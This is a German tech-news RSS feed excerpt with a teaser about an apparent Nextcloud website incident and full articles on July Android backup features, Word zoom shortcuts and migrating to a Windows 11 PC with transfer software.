<content:encoded><![CDATA[Ganz wilde Geschichte bei Nextcloud. Gestern Nacht konnten Anwender beobachten, dass beim Aufrufen der Seite Nextcloud.com die Inhalte einer Cloudbox angezeigt wurden. Stunden später wurde die Seite in den Wartungsmodus versetzt. Wurde Nextcloud.com gehackt? Möglich ist es. Auch Google hat...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/nextcloud-da-ist-wohl-etwas-ganz-wildes-passiert/">Nextcloud: Da ist wohl etwas ganz Wildes passiert</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Diese neuen Funktionen bekommen Android-Nutzer im Juli]]></title>
<description><![CDATA[Google ist aktuell dabei, ein neues Google-Play-System-Update auszurollen. Damit erhalten Android-Nutzer monatlich neue Funktionen, die einen direkten Einfluss auf ihr Smartphone haben (unabhängig vom Hersteller).



Die Seite 9to5Google hat die wichtigsten Neuerungen zusammengefasst. Demnach bek...]]></description>
<link>https://tsecurity.de/de/3680562/it-nachrichten/diese-neuen-funktionen-bekommen-android-nutzer-im-juli/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680562/it-nachrichten/diese-neuen-funktionen-bekommen-android-nutzer-im-juli/</guid>
<pubDate>Mon, 20 Jul 2026 10:18:23 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google ist aktuell dabei, ein neues Google-Play-System-Update auszurollen. Damit erhalten Android-Nutzer monatlich neue Funktionen, die einen direkten Einfluss auf ihr <a href="https://www.pcwelt.de/article/1924183/das-beste-smartphone-im-test.html" target="_blank" rel="noreferrer noopener">Smartphone </a>haben (unabhängig vom Hersteller).</p>



<p>Die Seite <a href="https://9to5google.com/2026/07/09/android-documents-backup/" target="_blank" rel="noreferrer noopener">9to5Google</a> hat die wichtigsten Neuerungen zusammengefasst. Demnach bekommen Android-Nutzer die Option, die Sicherung von SMS-, MMS- und RCS-Nachrichten direkt zu steuern. Das ähnelt der <a href="https://www.pcwelt.de/article/3181692/alle-android-nutzer-bekommen-nun-diese-wichtige-backupfunktion.html" target="_blank" rel="noreferrer noopener">separaten Backup-Einstellung für ausgewählte Apps</a>, die wir Ihnen letzte Woche vorgestellt hatten.</p>



<p>Über <strong>Einstellungen &gt; Konten und Sicherung &gt; Google-Sicherung &gt; Weitere Gerätedaten</strong> gibt es nach Erhalt des Updates einen neuen Ein-/Aus-Schalter für SMS- und MMS-Nachrichten, Anrufverlauf und Geräteeinstellungen. Sie haben also deutlich mehr Kontrolle darüber, welche Daten Sie über die Google-Cloud speichern wollen.</p>



<p>Das ist auch besonders wichtig, da Google seit Neuestem <a href="https://www.pcwelt.de/article/3185747/google-erlaubt-android-nutzern-ab-sofort-kein-kostenloses-backup-mehr-speicherplatz-angererechnet.html" target="_blank" rel="noreferrer noopener">keine Gratis-Backups für Android-Geräte mehr erlaubt</a>. Jedes Backup Ihres Smartphones zählt also direkt auf Ihr verfügbares Speicherkontingent ein, das in der Gratis-Variante gerade einmal 15 GB sind.</p>



<p>Zusätzlich führt Android nun die lokale Sicherung von Dokumenten ein. Damit können Sie Ihre heruntergeladenen Dokumente automatisch in Google Drive speichern, damit diese sicher und von jedem Ihrer Geräte aus zugänglich sind. Auf der Seite „Sicherung“ erscheint dann neben „Fotos &amp; Videos“ und „Sonstige Gerätedaten“ ein neues Menü namens „Dokumente“.</p>



<p>Google erklärt, dass zu den unterstützten Dateiformaten .DOC, .PPT, .XLS, .PDF “und alle anderen auf diesem Gerät gespeicherten Dokumente” gehören. Dokumente sollen bei der Übertragung zwischen Ihrem Gerät und den Google-Diensten verschlüsselt werden. Änderungen, die an den Dokumenten an einem Ort vorgenommen werden, werden nicht mit anderen Orten synchronisiert.</p>



<h3 class="wp-block-heading">Mehr Neuerungen</h3>



<p>In den <a href="https://support.google.com/product-documentation/answer/14343500?hl=de" target="_blank" rel="noreferrer noopener">Versionshinweisen zu den Google-Systemdiensten</a> finden sich noch mehr kleine Neuerungen, die jetzt an Android-Nutzer ausgerollt werden. Dazu gehören unter anderem die Überarbeitung von In-App-Käufen mithilfe einer “verbesserten, nativen Storefront für Google One”, die Übertragung von Arbeitsprofilen auf Wear-OS-Smartwatches, eine neue Google-Standortfreigabe für Chromebooks sowie „neue Funktionen für Entwickler von Google- und Drittanbieter-Apps zur Unterstützung von Prozessen in ihren Apps im Zusammenhang mit Google Maps”.</p>



<p>All diese neuen Funktionen werden seit dem 6. Juli an Android-Nutzer verteilt. Über <strong>Einstellungen</strong> <strong>&gt;</strong> <strong>Sicherheit und Datenschutz</strong> <strong>&gt;</strong> <strong>Updates</strong> <strong>&gt;</strong> <strong>Google Play-Systemupdate</strong> können Sie die aktuell installierte Version der Google Play System Updates prüfen und gegebenenfalls auf eine neue Version aktualisieren.</p>



<p><a href="https://www.pcwelt.de/article/3092158/android-17-diese-smartphones-bekommen-das-update-komplette-geraeteliste.html" target="_blank" rel="noreferrer noopener">Android 17: Diese Smartphones bekommen das Update</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[So zoomen Sie in Word schneller und steuern die Ansicht ohne Maus]]></title>
<description><![CDATA[Word bietet gleich mehrere Möglichkeiten an, wie Sie Texte heran- oder wegzoomen können. Für die meisten davon benötigen Sie die Maus, es geht aber auch ohne: 




Ziehen Sie den Zoomregler rechts unten im Word-Fenster auf den gewünschten Wert. 



Drücken Sie die Taste Strg und drehen Sie am Mau...]]></description>
<link>https://tsecurity.de/de/3680393/windows-tipps/so-zoomen-sie-in-word-schneller-und-steuern-die-ansicht-ohne-maus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680393/windows-tipps/so-zoomen-sie-in-word-schneller-und-steuern-die-ansicht-ohne-maus/</guid>
<pubDate>Mon, 20 Jul 2026 08:26:27 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Word bietet gleich mehrere Möglichkeiten an, wie Sie Texte heran- oder wegzoomen können. Für die meisten davon benötigen Sie die Maus, es geht aber auch ohne: </p>



<ul class="wp-block-list">
<li>Ziehen Sie den Zoomregler rechts unten im Word-Fenster auf den gewünschten Wert. </li>



<li>Drücken Sie die Taste Strg und drehen Sie am Mausrad. </li>



<li>Öffnen Sie das Ribbon „Ansicht“ und klicken Sie im Abschnitt Zoom auf die Voreinstellungen „Eine Seite“, „Mehrere Seiten“ und „Seitenbreite“.</li>
</ul>



<p>Mit einem Klick auf „100%“ stellen Sie den Zoomfaktor auf den Wert von 100 Prozent ein, über die Schaltfläche „Zoom“ bekommen Sie zusätzlich Zugriff auf drei voreingestellte Zoommodi. – Alternativ dazu können Sie den drei vorgegebenen Zoomfaktoren 75, 100 und 200 Prozent Tastenkombinationen zuweisen. Damit können Sie die Vergrößerungsstufe auch ohne den Griff zur Maus ändern. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5dbf7d4826b"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/zoom_RGBeci.jpg?quality=50&amp;strip=all" alt="Word Tastatur anpassen" class="wp-image-3125874" width="696" height="445" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Sie können den fest eingerichteten Zoomfaktoren Tastenkombinationen zuweisen, um schnell vergrößern und verkleinern zu können.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>So gehen Sie vor: Klicken Sie mithilfe der rechten Maustaste auf eine freie Fläche des aktuellen Ribbons und wählen Sie nun „Menüband anpassen“. Klicken Sie unten neben Tastenkombinationen auf „Anpassen“ und scrollen Sie im Fenster „Kategorien“ nach unten. Markieren Sie dort „Alle Befehle“. Klicken Sie rechts daneben ins Fenster „Befehle“ und scrollen Sie nach unten. </p>



<p>Dort finden Sie die drei Einträge „AnsichtZoom100“, „Ansicht Zoom200“ wie auch „AnsichtZoom75“. Markieren Sie sie der Reihe nach, setzen Sie den Cursor danach jeweils in das Feld „Neue Tastenkombination“ und drücken Sie die gewählten Tasten. Frei sind beispielsweise noch Alt-x, Alt-y und Alt-z. Bestätigen Sie jeweils mit „Zuordnen“ und klicken Sie dann zum Schluss auf „Schließen“.</p>



<p><strong>Lesetipp: </strong><a href="https://www.pcwelt.de/article/2626620/word-funktionen-tipps-tricks.html" target="_blank" rel="noreferrer noopener">Diese 12 Word-Funktionen müssen Sie kennen</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Neuer PC? So übertragen Sie alles auf Windows 11 ohne Stress]]></title>
<description><![CDATA[Ein neuer PC ist schnell gekauft – der eigentliche Aufwand beginnt danach. Programme, Dateien, Benutzerkonten und Einstellungen sollen möglichst vollständig vom alten Rechner mitkommen. Wer alles von Hand einrichtet, verliert schnell einen ganzen Tag.



Umzugssoftware nimmt Ihnen diese Arbeit ab...]]></description>
<link>https://tsecurity.de/de/3679150/windows-tipps/neuer-pc-so-uebertragen-sie-alles-auf-windows-11-ohne-stress/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679150/windows-tipps/neuer-pc-so-uebertragen-sie-alles-auf-windows-11-ohne-stress/</guid>
<pubDate>Sun, 19 Jul 2026 10:41:36 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Ein neuer PC ist schnell gekauft – der eigentliche Aufwand beginnt danach. Programme, Dateien, Benutzerkonten und Einstellungen sollen möglichst vollständig vom alten Rechner mitkommen. Wer alles von Hand einrichtet, verliert schnell einen ganzen Tag.</p>



<p>Umzugssoftware nimmt Ihnen diese Arbeit ab und überträgt viele Inhalte in einem Durchgang. Das lohnt sich besonders, wenn der alte Windows-10-PC ersetzt wird: Zwar gibt es über erweiterte Sicherheitsupdates noch Aufschub bis 2027, langfristig führt beim Neukauf aber meist Windows 11 den Weg vor. Wir zeigen, welche Wege es für den PC-Umzug gibt und worauf Sie achten sollten.</p>



<h2 class="wp-block-heading">Welche Wege es für den Datenumzug gibt</h2>



<p>Für den Wechsel auf einen neuen PC haben Sie drei Möglichkeiten. Spezialisierte Umzugssoftware überträgt Programme, Benutzerkonten und Dateien in einem Rutsch – der bequemste Weg, wenn installierte Anwendungen mitkommen sollen.</p>



<div class="ppl_wrap"><div class="top_head"><p class="pro_tag">PROMOTION</p><p><strong>Ihr Bildschirm ist zu klein? Dieser 17-Zöller bietet Platz für alles</strong></p></div><div class="ppl_row"><div class="pro_right promotion-item__image-outer-wrapper--small"><img decoding="async" class="promotion-item__image" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/HP-PPL-7.png" loading="lazy"></div><p class="ppl_text">
</p><p>Das HP OmniBook 7 überzeugt mit einem großzügigen 17,3 Zoll FHD-Touchdisplay für Übersicht bei Office-Arbeit, Multimedia und leichtem Gaming. Der Intel® Core™ Ultra 7 Prozessor mit 32 GB RAM meistert anspruchsvolle Aufgaben, die NVIDIA® RTX™ 4050 sorgt für zusätzliche Grafikleistung bei Kreativ-Workflows. Die beleuchtete Tastatur mit Nummernblock erleichtert die Dateneingabe, Fast Charge bringt den Akku schnell wieder auf 50 %.</p>
</div><div class="clear-both"></div><div class="more_btn"><a href="https://www.awin1.com/cread.php?awinaffid=486277&amp;awinmid=11348&amp;clickref=rss&amp;ued=https://www.notebooksbilliger.de/hp+omnibook+7+17+dc0177ng+888580" target="_blank" class="promotion-view-deal-link" rel="noopener">Erfahren Sie mehr über das HP OmniBook 7</a></div></div>



<p>Die Bordmittel von Windows decken primär persönliche Dateien und ausgewählte Einstellungen ab: Über ein Microsoft-Konto und OneDrive landen synchronisierte Ordner, einige Windows-Einstellungen sowie Store-Apps auf dem neuen Gerät. Klassische Desktop-Programme müssen Sie damit jedoch neu installieren.</p>



<p>Bleibt der manuelle Umzug per externer Festplatte oder NAS. Diese Methode ist günstig und transparent, aber zeitraubend. Sie kopieren Dokumente, Bilder, Downloads, Browserprofile und Projektordner selbst und installieren anschließend jede Anwendung neu. Dieser Ratgeber stellt deshalb die komfortablere Variante mit Umzugssoftware in den Mittelpunkt und vergleicht zwei verbreitete Programme.</p>



<h2 class="wp-block-heading">Windows-Umzug mit PCmover Professional</h2>



<p><a href="https://software.pcwelt.de/offer/laplink-pcmover-professional-v11/44211?x-source=rss">PCmover Professional</a> von Laplink zählt zu den bekanntesten Umzugsprogrammen für Windows. Es kopiert Anwendungen, Daten, Benutzerkonten und Einstellungen vom alten Windows-PC auf den neuen Rechner mit Windows 11. Die Software kostet ab 34,95 Euro, eine reine Testversion reicht in der Regel nicht für einen vollständigen Programmumzug.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5c8db0d5d8b"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2023/06/pcmover-Transferoptionen.png?w=1200" alt="Laplink PCmover Professional v11 Optionen" class="wp-image-1945143" width="1200" height="799" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Christoph Hoffmann</p></div>



<p>Installieren Sie PCmover zunächst auf dem alten PC, also der Quelle. Nach dem Start ist die Übertragung zwischen zwei Rechnern voreingestellt. Unter „Erweiterte Optionen“ stehen zusätzlich der Umzug per Laufwerk und per Imagedatei bereit. Ein Klick auf „Übertragung zwischen PCs“ startet den Vorgang. Vor dem Fortfahren tragen Sie Name, E-Mail-Adresse und die nach dem Kauf erhaltene Seriennummer ein.</p>



<p>Installieren und starten Sie das Programm danach auf dem Ziel-PC mit Windows 11. Beide Rechner müssen sich im selben Netzwerk befinden. Ein spezielles Kabel ist nicht nötig, wenn beide PCs per LAN oder stabilem WLAN verbunden sind. Für große Datenmengen empfiehlt sich Gigabit-LAN, weil der Transfer darüber deutlich zuverlässiger und schneller läuft als über ein schwaches Funknetz.</p>



<p>PCmover sucht den Ziel-PC und stellt die Verbindung her. Anschließend zeigt die Software beide Rechner nebeneinander an. Prüfen Sie an dieser Stelle unbedingt die Übertragungsrichtung: Quelle muss der alte PC sein, Ziel der neue Windows-11-Rechner. Bei Bedarf lässt sich die Richtung umkehren.</p>



<p>Ein Klick auf „PC analysieren“ führt zur Auswahl. Hier stehen mehrere Optionen bereit, von der empfohlenen Standardübertragung bis zur manuellen Auswahl. Mit der Standardoption wird der neue PC weitgehend zum Abbild des alten – etwa mit Windows 11 statt Windows 10. </p>



<p>Über „Weiter“ erhalten Sie eine Zusammenfassung in mehreren Kategorien. Kontrollieren Sie vordergründig den Punkt „Anwendungen“: Standardmäßig sind alle übertragbaren Programme markiert; einzelne können abgewählt werden.</p>



<p>Wie lange der Umzug dauert, hängt von der Datenmenge, dem Netzwerktempo und der Anzahl der Programme ab. Bei einem gut gefüllten PC kommen schnell mehrere Stunden zusammen. Nach Abschluss meldet das Programm den Erfolg. Starten Sie den neuen PC neu, damit alle Änderungen greifen.</p>



<h2 class="wp-block-heading">Die Alternative: EaseUS Todo PCTrans</h2>



<p>Wer nicht zwingend zu PCmover greifen möchte, findet in <a href="https://www.dpbolvw.net/click-1676582-15557692?sid=rss&amp;url=https://www.easeus.de/daten-uebertragen-software/pctrans-free.html">EaseUS Todo PCTrans</a> eine verbreitete Alternative. Das Programm überträgt ebenfalls Programme, Dateien, Benutzerkonten und Einstellungen zwischen zwei Rechnern. Der Umzug von Windows 10 auf Windows 11 zählt zu den typischen Einsatzszenarien.</p>



<p>Der wichtigste Unterschied liegt beim Einstieg. EaseUS Todo PCTrans gibt es als Free-Version, die nur fünf Programme und eine zwei Gigabyte Daten überträgt. Das genügt zum Ausprobieren oder für sehr kleine Umzüge. Wer viele Programme, große Benutzerordner oder mehrere Konten übertragen will, benötigt die kostenpflichtige <a href="https://www.dpbolvw.net/click-1676582-15557692?sid=rss&amp;url=https://www.easeus.de/daten-uebertragen-software/pctrans.html">Pro-Version</a> ab 40 Euro.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5c8db0d672e"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/easeus-todo-pctrans-2-2.jpg?quality=50&amp;strip=all" alt="easeus-todo-pctrans" class="wp-image-3178968" width="997" height="696" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">EaseUS</p></div>



<p>Die Bedienung folgt demselben Grundmuster wie bei PCmover. Sie installieren das Programm auf beiden Rechnern und legen über „PC zu PC“ die Richtung fest: alter PC als Quelle, neuer PC als Ziel. Beide Geräte müssen sich im selben Netzwerk befinden. Danach wählen Sie aus, welche Programme, Dateien und Konten mitkommen, und starten die Übertragung.</p>



<p>Neben dem Netzwerkweg beherrscht EaseUS Todo PCTrans auch den Umzug per Imagedatei auf einem externen Datenträger. Das ist praktisch, wenn beide PCs nicht gleichzeitig verfügbar sind oder der alte Rechner nur noch eingeschränkt läuft. Der Transfer erfolgt lokal, nicht über fremde Cloud-Server.</p>



<h2 class="wp-block-heading">PCmover oder EaseUS – was passt zu wem?</h2>



<p>Beide Programme verfolgen denselben Zweck, unterscheiden sich aber bei Preis, Bedienlogik und Zielgruppe. EaseUS Todo PCTrans ist attraktiv, wenn Sie zunächst kostenlos testen oder nur wenige Programme übertragen möchten. </p>



<p>Für einen kompletten Umzug mit vielen Anwendungen und großen Datenmengen führt dagegen auch hier meist kein Weg an einer kostenpflichtigen Version vorbei.</p>



<p>PCmover Professional richtet sich stärker an Anwender, die einen möglichst vollständigen und kontrollierten Wechsel wünschen. Das Programm ist besonders interessant, wenn der neue Rechner dem alten möglichst stark ähneln soll und viele installierte Anwendungen mitkommen müssen.</p>



<p>Für einfache Fälle reicht oft die Kombination aus OneDrive, externer Festplatte und Neuinstallation der wichtigsten Programme. Für komplexe Systeme mit vielen Anwendungen, mehreren Benutzerkonten und gewachsenen Ordnerstrukturen spart Umzugssoftware dagegen viel Zeit.</p>



<h2 class="wp-block-heading">Tipp: Mailkonten auf den neuen PC umziehen</h2>



<p>Eine Windows-Neuinstallation oder ein neuer PC sind ein guter Anlass, auch das Mailprogramm zu überdenken – etwa eM Client, Thunderbird oder Outlook. Am einfachsten gelingt der Umzug, wenn Ihre Mailkonten bereits per IMAP eingerichtet sind. Bei IMAP bleiben die Nachrichten auf dem Server Ihres Mailproviders gespeichert und werden nur mit dem jeweiligen Gerät synchronisiert.</p>



<p>Der Vorteil: Sie greifen mit PC, Notebook, Smartphone oder Webmailer auf denselben Mailbestand zu. Für den Umzug richten Sie das Konto im Mailprogramm auf dem neuen Windows-PC einfach erneut ein. Dazu starten Sie den Einrichtungsassistenten, geben E-Mail-Adresse und Passwort ein und warten anschließend, bis das Programm alle Nachrichten synchronisiert hat. Je nach Postfachgröße und Internetverbindung kann das einige Zeit dauern.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5c8db0d7007"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Mailstore-Home-export-IMAP-Konto.png" alt="Mailstore Home export IMAP-Konto" class="wp-image-3178966" width="1024" height="574" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Christoph Hoffmann</p></div>



<p>Aufwendiger wird es, wenn Sie Ihre Mails bisher per POP3 abrufen. In diesem Fall liegen viele Nachrichten oft nur lokal auf dem alten Rechner. Dann sollten Sie das Postfach vor dem Wechsel sichern. Dafür eignet sich etwa <a href="https://www.pcwelt.de/article/1143948/e-mails-verwalten-mailstore-home.html">MailStore Home</a>, das für die private Nutzung kostenlos ist. Das Programm archiviert lokale Mailbestände und kann sie anschließend wieder exportieren.</p>



<p>Erstellen Sie zunächst auf dem alten PC mit MailStore Home ein Backup Ihres POP3-Postfachs und sichern Sie dieses auf einem externen Datenträger. Auf dem neuen PC installieren Sie Ihr Mailprogramm sowie MailStore Home. Dort laden Sie die Sicherung und exportieren die Nachrichten über „E-Mails exportieren“ in ein IMAP-Postfach.</p>



<p>Damit wandern die bisher nur lokal gespeicherten Mails auf den Server Ihres Providers. Anschließend stehen sie nicht nur auf dem neuen Windows-PC, sondern auch auf Smartphone, Tablet und im Webmailer synchron zur Verfügung. </p>



<p>Der Wechsel von POP3 zu IMAP lohnt sich daher besonders, wenn Sie Ihre E-Mails künftig auf mehreren Geräten nutzen möchten.</p>



<h2 class="wp-block-heading">Vor dem Umzug: Das sollten Sie beachten</h2>



<p>Unabhängig vom gewählten Programm sollten Sie vorab ein vollständiges Backup Ihrer wichtigen Daten auf einem externen Datenträger anlegen. Geht beim Transfer etwas schief, haben Sie eine unabhängige Kopie zur Hand.</p>



<p>Notieren Sie außerdem Lizenzschlüssel kostenpflichtiger Programme. Kostenlose Tools wie <a href="https://www.nirsoft.net/utils/product_cd_key_viewer.html" target="_blank" rel="noreferrer noopener">ProduKey </a>können gespeicherte Produktschlüssel auslesen, ersetzen aber keine vollständige Lizenzverwaltung – prüfen Sie daher zusätzlich die Kundenkonten der jeweiligen Softwareanbieter.</p>



<p>Manche Anwendungen verlangen nach dem Umzug eine erneute Aktivierung. Bei Programmen mit Gerätebindung kann es nötig sein, die Lizenz auf dem alten PC vorher zu deaktivieren oder im Kundenkonto freizugeben.</p>



<p>Bei Microsoft Office hängt der Aufwand von der Lizenz ab. Ein Microsoft-365-Abo oder eine an das Microsoft-Konto gebundene Office-Lizenz richten Sie auf dem neuen PC meist einfach erneut über das Konto ein. Ältere Einzelplatzlizenzen ohne Kontobindung können komplizierter sein.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5c8db0d795e"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Office365-Konto-Info.png?w=1200" alt="Office365 Konto-Info" class="wp-image-3178971" width="1200" height="581" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Christoph Hoffmann</p></div>



<p>Prüfen Sie überdies, ob alle wichtigen Programme unter Windows 11 laufen. Sehr alte Tools, Spezialsoftware, Treiberpakete, Scanner-Software oder ältere VPN-Clients können Probleme verursachen. Hier ist eine Neuinstallation oft sauberer als eine blinde Übernahme.</p>



<p><strong>Wichtiger Vorab-Tipp:</strong> Deinstallieren Sie auf dem alten PC vor dem Umzug alte Druckertreiber oder tief ins System eingreifende Software (wie Antivirenprogramme von Drittanbietern). Solche Systemkomponenten werden von Umzugsprogrammen manchmal fälschlicherweise mitkopiert und können das neue Windows 11-System instabil machen.</p>



<p>Planen Sie für einen gut gefüllten PC genügend Zeit ein. Je nach Datenmenge dauert die Übertragung von einer bis zu mehreren Stunden.</p>



<p>Nach dem Umzug sollten Sie Windows Update ausführen, Programme starten, Drucker prüfen, Cloud-Synchronisierung kontrollieren und wichtige Dateien stichprobenartig öffnen.</p>



<div class="wp-block-idg-base-theme-faq-block faq-block"><h2 class="faq-block-title"> FAQ </h2><hr class="block-horizotal-divider">
<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">1.</span>
<h3 class="wp-block-heading"><strong>Kann ich Programme einfach vom alten PC auf den neuen kopieren?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Nein, in der Regel reicht das Kopieren des Programmordners nicht aus. Viele Anwendungen legen Einträge in der Windows-Registry an, speichern Lizenzdaten an anderen Stellen oder installieren zusätzliche Komponenten. Deshalb müssen Programme entweder neu installiert oder mit spezieller Umzugssoftware übertragen werden.</p>
</div>
</div></div>



